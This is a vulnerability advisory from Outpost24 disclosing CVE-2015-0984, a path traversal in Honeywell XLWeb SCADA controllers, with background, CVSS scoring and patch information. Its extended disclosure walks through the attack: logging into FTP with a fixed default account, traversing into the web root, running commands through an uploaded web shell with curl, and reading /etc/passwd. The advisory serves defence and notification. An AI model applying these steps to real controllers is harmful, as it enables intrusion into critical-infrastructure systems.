Honeywell XLWEB SCADA Path Traversal

`  
SCADA - EXPLOITING CVE-2015-0984 FOR SHELL ACCESS  
  
This post is a follow up detailing how to achieve control of the actual  
XLWEB SCADA controller. The vulnerability is assigned with reference  
CVE-2015-0984.  
  
Rather than the application level administrative access as discussed in  
the email regarding CVE-2014-2717, this focuses on issues with the FTP,  
default accounts which could not be changed, and high privileges of the  
web server user resulting in a simple shell on the server.  
  
In this case we are looking at CVE-2015-0984, or ICSA-15-076-02, but we  
expect to be back with a second disclosure soon when the vendor have had  
a chance to look at the latest finding, still pending a CVE, if one will  
be assigned.  
  
For those interested in a more readable version of this disclosure and  
additional information, see  
https://www.outpost24.com/hacking-industrial-control-systems-case-study-falcon/  
  
Please note that the CVE at NVD uses a different CVSS vector than the  
one in this disclosure or from ICS-CERT, stating partial confidentiality  
and no availability or integrity impact. As this gives shell access to  
the system, I am relatively certain the C:C/A:C/I:C is the correct  
evaluation.  
  
  
  
_________________________  
  
*BACKGROUND*  
  
Honeywell is a US-based company that maintains offices worldwide.  
  
The affected products, XLWeb controllers, are web-based SCADA systems.  
According to Honeywell, XLWeb controllers are deployed across several  
sectors including Critical Manufacturing, Energy, Water and Waste water  
Systems, and others. Honeywell estimates that these products are used  
primarily in Europe and the Middle East.  
  
  
  
_________________________  
  
*VULNERABILITY OVERVIEW*  
  
The vulnerability is defined as a PATH TRAVERSAL. By using a directory  
traversal vulnerability in the FTP server, it is possible to gain access  
to the web root directory.  
  
A CVSS v2 base score of 10.0 has been assigned; the CVSS vector string  
is (AV:N/AC:L/Au:N/C:C/I:C/A:C)  
  
That is;  
Access Vector – Network  
  
Access Complexity – Low  
  
Authentication – None <--- Built in account used to target the system  
  
Complete impact to availability, integrity and confidentiality.  
  
Note that NVD uses an incorrect scoring which lists integrity and  
availability as unaffected, and confidentiality as partial.  
  
  
  
_________________________  
  
*MITIGATION*  
  
The update for this vulnerability is Excel Web Linux version 2.04.01  
(March, 2014) or later plus the programming tool CARE version 10.02  
(March 2014) or later. Customers are encouraged to contact their local  
Honeywell HBS branch to have their sites updated to the latest version.  
  
In the Centraline partner channel, Excel Web controllers also have been  
sold under the brand name “FALCON.” Centraline partners can directly  
access http://www.centraline.com and get these versions.  
  
Linux:  
https://www.centraline.com/index.php?id=847&route=article/index&directory_id=140&direct_link=1  
  
CARE:  
https://www.centraline.com/index.php?id=847&route=article/index&directory_id=138&direct_link=1  
  
  
  
_________________________  
  
*EXTENDED DISCLOSURE*  
  
The system has an account for localization and customization of parts of  
the interfaces. The account is available in numerous guides as found  
online, account name is XWADMIN.  
  
This account has access to the FTP server, and is also available for  
login via TELNET if present. The XWADMIN user is also the user executing  
the web-server on the platform.  
  
The platform uses a version of PHP with some vendor modifications, of  
importance to an attacker however is that the server support all the  
basic functionality one would need from a simple web-shell such as the  
exec and passthru functions.  
  
FTP (Windows command line)  
  
FTP honeydemo.internal  
Connected to honeydemo.internal.  
220- ###################################################  
220- # #  
220- # Welcome to the embedded ftp server #  
220- # #  
220- ###################################################  
220 xlweb FTP server (GNU inetutils 1.3b) ready.  
User (honeydemo.internal:(none)): xwadmin  
331 Password required for xwadmin.  
Password:  
230 User xwadmin logged in.  
ftp> cd ../../mnt/mtd6/xlweb/web  
250 CWD command successful.  
  
  
  
After uploading the shell, we can interact with the server. I like to  
keep it simple  
curl “http://honeydemo.internal/ws.php?code=[secret_string]&cmd=whoami”  
Response: xwadmin  
  
curl “http://honeydemo.internal/ws.php?code=[secret_string]&cmd=id”  
Response: uid=501(xwadmin) gid=101(xwadmin)  
  
  
  
And, since we all like a nice wrapper to do our work for us:  
  
python code\HoneyWell\CVE-2015-0984.PY  
Starting analysis  
Attempting connection via FTP to target vulnerability CVE-2015-0984...  
Connected to target, with authenticated access  
Using traversal vulnerability to get a shell  
Uploading shell...  
Shell uploaded, connecting...  
Shell open, running commands as xwadmin  
  
EXIT to quit  
CMD >> whoami  
xwadmin  
  
CMD >> cat ../../../../etc/passwd  
root:x:0:0:Super-User:/root:/bin/sh  
xwadmin:x:501:101:ExcelWeb-Administrator:/home/xwadmin:/bin/sh  
modem:x:502:102:Modem-User:/dev/null:/bin/false  
uucp:x:503:103:Unix-to-Unix CoPy system:/dev/null:/bin/false  
sshd:x:65535:65534:SSH-Deamon:/dev/null:/bin/false  
xwtrend:x:504:504:ftp-user:/tmp/xwtrend  
  
CMD >> EXIT  
Running cleanup, deleting shell and closing connections...  
Done, connection closed  
  
  
  
As patch penetration currently is close to 0 among the internet facing  
systems, and only very few have patched the critical risk from 2014, we  
will not be releasing the script-kiddie friendly tools for neither  
CVE-2014-2717 nor CVE-2015-0984, but the information here should be  
sufficient to demonstrate the implications of the issue and the need to  
apply patches.  
  
  
  
_________________________  
  
*FURTHER READING  
*Blog:  
https://www.outpost24.com/hacking-industrial-control-systems-case-study-falcon/  
NVD: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0984  
ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-15-076-02  
Outpost24 website: https://www.outpost24.com/  
  
As mentioned in the lead in, other issues were found during  
documentation for this advisory, leading to shell access even on fully  
patched systems, and the devices should be isolated from public  
networks. Just as the vendor recommends.  
  
  
  
_________________________  
  
*FINAL WORDS  
*Many thanks to Honeywell. During a year of research in the field, only  
3 vendors have reacted responsibly and remediated reported issues  
associated with SCADA systems. Honeywell have done it the fastest, and  
most efficient. This is why they appear in this disclosure – they have  
remediated and fixed the critical risk, and we hope other vendors will  
assume the same responsibility.  
  
  
  
--   
Best Regards,  
------------------------------------------------------------------------------------------  
Martin Jartelius  
CSO  
Outpost24 AB  
Bastionsgatan 6A | 371 32 Karlskrona | Sweden  
E: mj () outpost24 com W: www.outpost24.com <http://www.outpost24.com/>  
Outpost24 - Vulnerability Management Made Easy!  
  
  
`